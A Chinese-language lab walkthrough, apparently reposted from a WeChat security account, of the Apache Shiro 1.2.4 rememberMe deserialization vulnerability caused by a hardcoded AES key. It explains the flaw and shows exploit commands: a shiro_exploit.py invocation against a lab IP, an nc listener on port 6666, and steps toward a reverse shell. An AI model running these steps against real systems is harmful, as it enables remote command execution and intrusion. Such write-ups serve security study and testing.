1.漏洞描述

Apache Shiro是一款开源安全框架，提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用，同时也能提供健壮的安全性。

Apache Shiro 1.2.4及以前版本中，加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie，触发Java反序列化漏洞，进而在目标机器上执行任意命令。

2.漏洞简单分析

Shiro提供了一种下次访问时无需再登录就可访问的功能，即“记住我”功能。Shiro对rememberMe的字段做了加密处理，在CookieRememberMeManaer类中将cookie的字段依次进行序列化->AES加密->Base64编码。当需要识别用户身份时，会对cookie中rememberMe字段进行解密，其顺序依次为base64解码->解密AES->反序列化。

在这个过程中，我们发现AES密钥非常关键，但很不幸，密钥被硬编码到了代码中，也就意味着使用shiro组件的业务，其默认的AES密钥都是一样的。因此，攻击者可以构造一个恶意对象，并且进行序列化->AES加密->Base64编码后，作为cookie中rememberMe字段进行发送，Shiro将收到的rememberMe字段进行解码、AES解密、反序列化后，最终执行了一个恶意代码，造成反序列化漏洞。

3.漏洞验证

3.1 使用shiro_exploit.py进行利用，尝试写入文件jason123.txt

python shiro_exploit.py -t 3 -u http://192.168.233.134:8080 -p "touch jason123.txt"

3.2 登陆到目标靶机，发现文件成功写入，说明漏洞存在。

4.深度利用

4.1 尝试深度利用，在kali服务器上使用nc监听6666端口

nc -lvp 6666

4.2 使用Base64编码进行加密，保证命令成功执行，防止参数被类破坏。

4.3 使用exp执行反弹shell

4.4 成功获取shell，反弹成功

文章转自KALC，侵删

原文链接：https://mp.weixin.qq.com/s/tf5lxNHevmiqdZ56bJmlJQ

安全技术交流群，请扫码备注【加群】

原文始发于微信公众号（网络安全资源库）：Shiro 反序列化漏洞靶场